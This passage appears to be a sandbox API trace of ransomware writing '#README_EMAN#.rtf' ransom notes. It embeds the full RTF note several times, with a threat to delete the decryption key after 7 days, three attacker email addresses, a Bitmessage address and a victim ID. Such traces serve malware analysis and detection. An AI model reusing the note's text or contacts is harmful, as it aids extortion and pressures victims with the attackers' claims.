\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.317] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.318] CloseHandle (hObject=0x294) returned 1 [0285.318] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0285.318] GetLastError () returned 0x2 [0285.318] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write 